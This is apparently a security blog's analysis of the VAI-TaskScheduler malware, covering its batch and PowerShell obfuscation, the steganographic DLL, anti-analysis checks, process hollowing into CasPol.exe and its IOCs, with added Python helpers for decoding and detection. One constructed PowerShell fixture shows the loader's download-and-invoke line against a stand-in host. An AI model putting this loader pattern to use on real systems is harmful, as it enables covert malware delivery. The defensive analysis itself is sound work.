VAI-TaskScheduler Malware Analysis
Executive Summary – VAI-TaskScheduler Malware Overview
This post analyzes the obfuscation techniques used by the VAI-TaskScheduler malware and explains how the S4B Threat Research team extracted the associated indicators of compromise (IOCs). We refer to this sample as “VAI-TaskScheduler” based on the VAI method exposed by the DLL and its references to the Windows Task Scheduler.
This Windows malware has been observed being distributed as a batch script and leverages PowerShell, steganography, and process hollowing to deploy a .NET-based Remote Access Trojan (RAT) on compromised hosts. Additionally, it employs several tactics to complicate detection.
Moreover, the sample implements virtual machine and sandbox detection techniques to avoid exhibiting malicious behavior in controlled environments. When such conditions are detected, the malware terminates its execution immediately.
Sample Analysis of the VAI-TaskScheduler Malware
Batch Script Structure and Junk Substring Obfuscation in VAI-TaskScheduler Malware
The Silent4Business Threat Research team obtained a malware sample and performed a detailed analysis to understand its obfuscation and execution mechanisms on victim hosts.
The sample is a batch script that contains a Base64-encoded string, which in turn includes the substring cebad repeated across multiple segments:

These junk substrings are removed by the following command:
set "gleen=%gleen=%gleen:cebad=%"

Consequently, the script reconstructs the original encoded content before execution. The following figure illustrates how the junk substring is injected into the Base64 string that PowerShell later processes.

PowerShell Obfuscation and Payload Reconstruction
In addition to these junk substrings, the PowerShell command used to execute the payload is split across multiple variables. In this sample, the placeholder string areosystyle is inserted throughout the command and later removed in the same way as cebad in the previous example:

Once the junk substrings are removed and the command is reconstructed, the final PowerShell code resolves to the following instructions:

The resulting PowerShell code performs several actions:
- Configures the network connection to enforce the use of TLS 1.2.
- Creates a WebClient object to download the next-stage artifact.
- Downloads an image file containing a malicious DLL hidden using steganography.
- Loads the DLL directly into memory and invokes the VAI method exposed by the DLL.
As a result, the malware is able to execute its next-stage payload without writing the DLL to disk.
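To reproduce the two junk-string layers described above offline, here is an added Python helper (my code, not the post's or the malware's). Only the markers cebad and areosystyle and the CasPol.exe name come from the post; the split-variable layout, the URL and the order in which the layers nest are constructed assumptions.

```python
import base64
import re

def strip_junk(blob: str, junk: str) -> str:
    """Same effect as the batch substitution %var:junk=%: delete every occurrence."""
    return blob.replace(junk, "")

def decode_b64_loose(text: str) -> str:
    """Decode Base64 that may carry stray characters or missing '=' padding."""
    clean = re.sub(r"[^A-Za-z0-9+/=]", "", text)
    clean += "=" * (-len(clean) % 4)
    return base64.b64decode(clean).decode("utf-8", errors="replace")

def rebuild_command(fragments: list, placeholder: str) -> str:
    """Join the split PowerShell variables, then drop the placeholder string."""
    return strip_junk("".join(fragments), placeholder)

def recover_from_batch(junked_b64: str, junk: str = "cebad") -> str:
    """Undo the batch layer: strip the junk marker, then Base64-decode."""
    return decode_b64_loose(strip_junk(junked_b64, junk))

def extract_iocs(ps_code: str) -> dict:
    """Pull URLs and quoted .exe names (candidate VAI targets) out of recovered code."""
    return {
        "urls": re.findall(r"https?://[^\s'\"()]+", ps_code),
        "exe_names": re.findall(r"['\"]([^'\"]*\.exe)['\"]", ps_code, re.I),
    }

# --- CONSTRUCTED fixture mimicking the split-variable layout (not the real script) ---
PS_FRAGMENTS = [
    "[Net.ServicePointManager]::SecurityProtocolareosystyle = 'Tls12';",
    "$wc = New-Object Net.WebCareosystylelient;",
    "$img = $wc.DownloadData('http://example.invalid/stage.png');areosystyle",
    "$asm.GetType('T').GetMethod('VAI').Invoke($nareosystyleull, @('CasPol.exe'))",
]
CLEAN_PS = rebuild_command(PS_FRAGMENTS, "areosystyle")

def make_junked_b64(payload: str, junk: str = "cebad", every: int = 10) -> str:
    """Fixture builder: Base64-encode, then insert the junk marker every `every` chars."""
    b64 = base64.b64encode(payload.encode()).decode()
    return junk.join(b64[i:i + every] for i in range(0, len(b64), every))

if __name__ == "__main__":
    recovered = recover_from_batch(make_junked_b64(CLEAN_PS))
    print(recovered)
    print(extract_iocs(recovered))
```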

Steganography and DLL Extraction
After these steps, the image containing the DLL is downloaded. Inside this file, the embedded DLL (represented as a Base64 string) starts at offset 0x1538A8 and continues until the end of the file.

Once the DLL is extracted, we can use the Detect It Easy (DIE) tool to confirm that the file is a DLL and that it employs multiple obfuscation techniques.
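The carving step above, as an added Python example (mine, not the post's tooling): slice the image from the stated offset to EOF, Base64-decode, and run a minimal PE sanity check before opening the result in DIE. The offset 0x1538A8 is from the post; the image bytes are a constructed stand-in built from a tiny fake DLL header.

```python
import base64
import hashlib
import re
import struct

DLL_OFFSET = 0x1538A8      # start of the Base64 DLL inside the analysed PNG (from the post)
IMAGE_FILE_DLL = 0x2000    # COFF Characteristics flag marking a DLL

def carve_b64_payload(image: bytes, offset: int = DLL_OFFSET) -> bytes:
    """Take everything from `offset` to EOF, drop non-Base64 bytes, decode."""
    tail = re.sub(rb"[^A-Za-z0-9+/=]", b"", image[offset:])
    tail += b"=" * (-len(tail) % 4)
    return base64.b64decode(tail)

def pe_summary(blob: bytes) -> dict:
    """Minimal triage of the carved bytes: MZ/PE magic, DLL flag and SHA-256."""
    info = {"is_pe": False, "is_dll": False, "sha256": hashlib.sha256(blob).hexdigest()}
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return info
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0" or len(blob) < e_lfanew + 24:
        return info
    info["is_pe"] = True
    characteristics = struct.unpack_from("<H", blob, e_lfanew + 22)[0]
    info["is_dll"] = bool(characteristics & IMAGE_FILE_DLL)
    return info

# --- CONSTRUCTED fixture: PNG signature, zero padding up to the offset, then a tiny fake DLL ---
def fake_dll() -> bytes:
    hdr = bytearray(0x40 + 24)                      # DOS header + "PE\0\0" + COFF header
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)         # e_lfanew -> PE signature at 0x40
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<H", hdr, 0x40 + 22, 0x2102)  # EXECUTABLE_IMAGE | 32BIT_MACHINE | DLL
    return bytes(hdr)

def fake_image() -> bytes:
    b64 = base64.b64encode(fake_dll())
    return b"\x89PNG\r\n\x1a\n" + b"\0" * (DLL_OFFSET - 8) + b64 + b"\n"

if __name__ == "__main__":
    dll = carve_b64_payload(fake_image())
    print(pe_summary(dll))
```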

Anti-Analysis, Anti-Debugging, and Virtual Machine Detection
A quick analysis of the DLL shows that it implements virtual machine detection mechanisms. If the sample detects virtualization, it avoids performing malicious activity and terminates its execution.

Within the DLL, we can also identify strings that suggest the presence of anti-debugging techniques. Strings such as IsDebuggerPresent, IsAttached, and dnSpy, among others, can be used by the malware to detect whether it is being debugged and terminate its malicious activity.

Process Hollowing Behavior Used by the VAI-TaskScheduler Malware
HackForums.gigajew Namespace and Injection Techniques
We also identified a namespace named HackForums.gigajew within the DLL. The methods it exposes suggest that it is used to inject malicious code into a legitimate process, using a technique consistent with process hollowing:
- Creates a process in a suspended state.
- Retrieves and modifies the thread context.
- Unmaps memory regions.
- Writes arbitrary data to memory.
- Resumes execution of the previously suspended thread.
Taken together, these steps are characteristic of classic process injection and process hollowing behavior.
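As an added detection example (my code, not the post's), the stage list above can be turned into a matcher over an API trace: a pid is flagged only when a child is created suspended and every later stage is then seen for that pid. The trace line layout and the sample lines are constructed assumptions; a real feed from an API monitor or sandbox would need its own parser.

```python
import re
from collections import defaultdict

HOLLOWING_STAGES = [
    ("create_suspended", {"CreateProcessW", "CreateProcessA", "NtCreateUserProcess"}),
    ("get_context",      {"GetThreadContext", "NtGetContextThread", "Wow64GetThreadContext"}),
    ("unmap",            {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"}),
    ("write",            {"WriteProcessMemory", "NtWriteVirtualMemory"}),
    ("set_context",      {"SetThreadContext", "NtSetContextThread", "Wow64SetThreadContext"}),
    ("resume",           {"ResumeThread", "NtResumeThread"}),
]
# Assumed trace layout: "pid=<n> api=<name> [free-form args]"
LINE_RE = re.compile(r"^pid=(\d+)\s+api=(\w+)(?:\s+(.*))?$")

def parse_trace(lines):
    """Yield (pid, api, args) for every line that matches the assumed layout."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield int(m.group(1)), m.group(2), m.group(3) or ""

def hollowing_stages_seen(lines) -> dict:
    """Per calling pid, the set of hollowing stages observed after a suspended create."""
    seen = defaultdict(set)
    for pid, api, args in parse_trace(lines):
        for name, apis in HOLLOWING_STAGES:
            if api not in apis:
                continue
            if name == "create_suspended" and "CREATE_SUSPENDED" not in args:
                break                       # a normal child process: not hollowing
            if name != "create_suspended" and "create_suspended" not in seen[pid]:
                break                       # later stages only count once a suspended child exists
            seen[pid].add(name)
    return dict(seen)

def flag_hollowing(lines) -> list:
    """Pids whose trace covers every stage; these deserve memory inspection."""
    return sorted(pid for pid, s in hollowing_stages_seen(lines).items()
                  if len(s) == len(HOLLOWING_STAGES))

SAMPLE_TRACE = [  # CONSTRUCTED lines, not output from any real tool
    "pid=4120 api=CreateProcessW image=CasPol.exe flags=CREATE_SUSPENDED",
    "pid=4120 api=GetThreadContext",
    "pid=4120 api=NtUnmapViewOfSection",
    "pid=4120 api=WriteProcessMemory",
    "pid=4120 api=SetThreadContext",
    "pid=4120 api=ResumeThread",
    "pid=900 api=CreateProcessW image=notepad.exe flags=0",
]
```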

CasPol.exe as the Injection Target
Execution of the sample in a controlled environment confirms that the CasPol.exe process is spawned. This matches the process name passed to the VAI function in the PowerShell script.

This process initiates a network connection to the IP address 172.245.112.200.

Analysis of the compromised host’s memory confirms the use of process hollowing for code injection.

Indicators of Compromise (IOCs)
| Type | Value | Description |
|---|---|---|
| SHA256 | 133bacca2fa5c5213a66dc6caa3b0accf4c152a2050cd7b794bbf833a3a71baa | script.bat |
| SHA256 | 5235618ca44454fadf0d76437bfc6741e121a12427be07a76198593400e7f620 | MSI_PRO_with_b64.png |
| SHA256 | a1edf9b9b8aab1ce9b5e17d73e2a9a2c45cfb1894417aac1361ce370718cbbfe | abortorium.dll |
| URL | hxxp[:]//ia601400[.]us[.]archive[.]org/10/items/msi-pro-with-b-64_20251023/MSI_PRO_with_b64[.]png | |
| IP | 172.245.112.200 | |
Conclusions
During the analysis, we observed that the malware uses multiple obfuscation techniques to evade detection by security tools, as well as several mechanisms to avoid behavioral analysis in controlled environments such as sandboxes and virtual machines.
Based on available threat intelligence, we assess that the payload delivered by this malware is associated with a Remote Access Trojan (RAT) with information-stealing capabilities, including the theft of access credentials from compromised hosts.